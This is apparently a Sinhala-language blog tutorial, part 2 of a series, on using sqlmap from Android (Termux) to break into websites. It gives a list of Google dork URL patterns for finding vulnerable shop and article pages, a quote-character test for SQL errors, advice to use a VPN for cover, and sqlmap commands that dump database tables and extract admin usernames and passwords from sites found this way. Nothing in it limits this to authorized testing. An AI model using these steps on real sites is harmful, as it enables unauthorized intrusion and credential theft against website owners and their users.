Hacking Website Sqlmap on Android - Part 2

Sqlmap on Android - Part 2 [Hacking Websites]





හලො ප්‍රෙන්z... හුගක් කාලෙකින් thread එකක් කොටන්නත් බැරි උනා. (හැමදාම වගෙ දාන්නේ මෙක තමා :D )  දැන්නම් පොඩ්ඩක් hacking පැත්තෙන් එකක් කොටන්න හිතුනා.. (හා කමක් නැ.. :shy:  )
අපි අද කතා කරන්නෙ Android වලින් sqlmap එකෙන් වෙබ් එකක Database එක Hackzzz කොරලා Username  එකයි Pword  :P  එකයි ගන්න හැටි. 

Target එකට attack කිරිමට අවශ්‍ය ද්‍රව්‍ය=( ඔයා ගාව තියෙන්න ඔන එවා ඇ..)

- 1.කොහෙන් හරි Android Phone එකක් 
  2. හොද පදමට වැඩ කරන 3G Connection එකක් (up to 50kbps)
  3.හොදින් මිශ්ර කර ගත් Virtual private Network එකක් (VPN බන්.. :) )
  4. ES file maneger එක ඔන වෙනවා. . . (හැදි ගාන්න)

අපි බලමු මෙ ද්‍රව්‍ය වලින් වැඩක් ගන්න හැට්. මුලින් ඔයා Google dork කරන්න ඔනෙ vulnerable තියෙන site එකක් හොයා ගන්න. මම ටිකක් දෙන්නම්. 


addToCart.php?idProduct=

addtomylist.php?ProdId=

adminEditProductFields.php?intProdID=

advSearch_h.php?idCategory=

affiliate.php?ID=

affiliate-agreement.cfm?storeid=

affiliates.php?id=

ancillary.php?ID=

archive.php?id=

article.php?id=

phpx?PageID

basket.php?id=

Book.php?bookID=

book_list.php?bookid=

book_view.php?bookid=

BookDetails.php?ID=

browse.php?catid=

browse_item_details.php

Browse_Item_Details.php?Store_Id=

buy.php?

buy.php?bookid=

bycategory.php?id=

cardinfo.php?card=

cart.php?action=

cart.php?cart_id=

cart.php?id=


Search result වල එන site එකක් තොර ගෙන එ url එකෙ අගට ' හො %27 කියලා ගහන්න. 
Sql error එකක් ආවොත් එක vuln page එකකි.( එ කියන්නෙ එක hack කරන්න පුලුවන්)

දැන් ඉතින් වැඩෙට බහිමු.

මුලින් ES file maneger එක ඹනා වෙනවා මෙකට (DB and Logs බලන්න බන්)

මෙතනින් ගන්න

දැන් vpn එකක් use කරනවනම් හොදයි. (එකට කැමති එකක් ගන්න)

ඊගාවට sqlmap එක open කර ගන්න 



sqlmap එක Android වල run කරන හැටි ගැන අපි part 1 වල කතා කොරා නේ.. දන්නෙ නැත්තන් මෙතනින් ගිහින් බලන්‍න sqlmap part 1.(මතක ඇතුව ආයෙ වරෙන් හොදේ??) 

හරි බලමු. ඔයා හොයා ගත්ත vul site එකෙ link එක paste කර⁣ගන්න
ex-  https://www.MonsteR_X.com/index.php?id=1 

දැන් termux එකෙන් sqlmap open කරලා මෙහම දෙන්න. 
python2 sqlmap.py -u https://www.MonsteR_X.com/index.php?id=1}

එහෙමත් නැත්තන් vuln site එකක් sqlmap එකෙන්ම හොයන්න පුලුවන්. මම උඩ දිපු dork එකක් අරන් මේම ගහන්න

 python2 sqlmap.py -g ( you Dork here )

Ex- index.php?id=

දැන් sqlmap එක check කරනවා site එක. ඊට පස්සෙ fail or Next result වැටෙයි.
අහන හැම එකකටම Y දෙන්න.


හරි ඊගාවට අපි tables බලන්න ඔනේ. එකට මෙහෙම දෙන්න.
python2 sqlmap.py -u https://www.MonsteR_X.com/index.php?id=1 --tables

දැන් tables මෙහෙම පෙන්නයි.


දැන් Admin table එක බලන්න මෙහෙම ගහන්න. 

python2 sqlmap.py -u https://www.MonsteR_X.com/index.php?id=1-T you_table name

අදාල table එක ගැහුවනම් log.txt file එකක් save වෙයි phone එකෙ. එකෙ අැති admin name , password. එවා
( Txt file location එක අන්තිමට වැටෙයි.)


එහෙනම් මම කැපුනා. ජය ශ්‍රි...!

Comments

Unknown said…
Thada Thada Hiruwo